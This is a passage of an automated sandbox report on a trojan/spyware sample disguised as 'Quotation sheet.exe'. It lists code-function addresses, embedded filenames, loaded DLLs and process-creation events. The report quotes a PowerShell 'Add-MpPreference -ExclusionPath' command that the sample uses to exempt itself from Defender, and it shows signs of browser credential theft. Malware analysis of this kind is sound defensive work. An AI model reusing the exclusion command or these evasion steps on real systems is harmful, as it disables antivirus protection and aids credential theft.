                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F7A467_2_053F7A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DDAAC7_2_053DDAAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05385AA07_2_05385AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E1AA37_2_053E1AA3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EDAC67_2_053EDAC6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050905919_2_05090591
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050744209_2_05074420
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050824469_2_05082446
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD05359_2_04FD0535
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0507E4F69_2_0507E4F6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEC6E09_2_04FEC6E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FCC7C09_2_04FCC7C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD07709_2_04FD0770
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FF47509_2_04FF4750
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506A1189_2_0506A118
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050581589_2_05058158
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050901AA9_2_050901AA
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050841A29_2_050841A2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050881CC9_2_050881CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050620009_2_05062000
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC01009_2_04FC0100
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508A3529_2_0508A352
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050903E69_2_050903E6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDE3F09_2_04FDE3F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050702749_2_05070274
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050502C09_2_050502C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC0CF29_2_04FC0CF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506CD1F9_2_0506CD1F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD0C009_2_04FD0C00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FCADE09_2_04FCADE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FE8DBF9_2_04FE8DBF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05070CB59_2_05070CB5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDAD009_2_04FDAD00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05012F289_2_05012F28
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05072F309_2_05072F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05044F409_2_05044F40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FE2E909_2_04FE2E90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD0E599_2_04FD0E59
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0504EFA09_2_0504EFA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDCFE09_2_04FDCFE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508EE269_2_0508EE26
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC2FC89_2_04FC2FC8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508CE939_2_0508CE93
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FF0F309_2_04FF0F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508EEDB9_2_0508EEDB
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FFE8F09_2_04FFE8F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FB68B89_2_04FB68B8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0509A9A69_2_0509A9A6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD28409_2_04FD2840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDA8409_2_04FDA840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD29A09_2_04FD29A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FE69629_2_04FE6962
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508AB409_2_0508AB40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FCEA809_2_04FCEA80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05086BD79_2_05086BD7
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050875719_2_05087571
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC14609_2_04FC1460
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506D5B09_2_0506D5B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050995C39_2_050995C3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508F43F9_2_0508F43F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508F7B09_2_0508F7B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050156309_2_05015630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050816CC9_2_050816CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD70C09_2_04FD70C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0509B16B9_2_0509B16B
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0500516C9_2_0500516C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FDB1B09_2_04FDB1B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FBF1729_2_04FBF172
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0507F0CC9_2_0507F0CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050870E99_2_050870E9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508F0E09_2_0508F0E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508132D9_2_0508132D
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEB2C09_2_04FEB2C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD52A09_2_04FD52A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0501739A9_2_0501739A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FBD34C9_2_04FBD34C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050712ED9_2_050712ED
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05081D5A9_2_05081D5A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05087D739_2_05087D73
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05049C329_2_05049C32
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEFDC09_2_04FEFDC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD3D409_2_04FD3D40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FCF29_2_0508FCF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FF099_2_0508FF09
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD9EB09_2_04FD9EB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FFB19_2_0508FFB1
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F93FD29_2_04F93FD2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F93FD59_2_04F93FD5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD1F929_2_04FD1F92
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_050659109_2_05065910
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD38E09_2_04FD38E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0503D8009_2_0503D800
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FD99509_2_04FD9950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEB9509_2_04FEB950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FB769_2_0508FB76
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05045BF09_2_05045BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0500DBF99_2_0500DBF9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0508FA499_2_0508FA49
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05087A469_2_05087A46
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05043A6C9_2_05043A6C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FEFB809_2_04FEFB80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05015AA09_2_05015AA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_05071AA39_2_05071AA3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0506DAAC9_2_0506DAAC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0507DAC69_2_0507DAC6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D720809_2_02D72080
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6CF609_2_02D6CF60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6B2B09_2_02D6B2B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6B2A49_2_02D6B2A4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6D1809_2_02D6D180
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D6B1609_2_02D6B160
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D757309_2_02D75730
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D739309_2_02D73930
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D8BE109_2_02D8BE10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539E6DC9_2_0539E6DC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539E3E49_2_0539E3E4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539E2C89_2_0539E2C8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539D8139_2_0539D813
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539D8489_2_0539D848
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_0539CAE89_2_0539CAE8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 04FBB970 appears 280 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0503EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 05017E54 appears 111 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 05005130 appears 58 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0504F290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05375130 appears 58 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05387E54 appears 111 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0532B970 appears 280 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 053BF290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 053AEA12 appears 86 times
                      Source: Quotation sheet.exe, 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2358890483.0000000007B80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2356806386.00000000065E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000002.2336603379.00000000014EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation sheet.exe
                      Source: Quotation sheet.exe, 00000000.00000000.2125533262.0000000000F92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBCYJ.exe> vs Quotation sheet.exe
                      Source: Quotation sheet.exeBinary or memory string: OriginalFilenameBCYJ.exe> vs Quotation sheet.exe
                      Source: Quotation sheet.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation sheet.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, PPUKR5wZS9CW8kiXFb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, PPUKR5wZS9CW8kiXFb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/7@12/9
                      Source: C:\Users\user\Desktop\Quotation sheet.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation sheet.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjko1olp.jns.ps1Jump to behavior
                      Source: Quotation sheet.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Quotation sheet.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\Quotation sheet.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: pcaui.exe, 00000009.00000003.2642733866.00000000031DA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3971801019.000000000322A000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3971801019.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2642854553.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2645125817.0000000003206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Quotation sheet.exeReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Users\user\Desktop\Quotation sheet.exe "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: pcaui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: mlang.dllJump to behavior
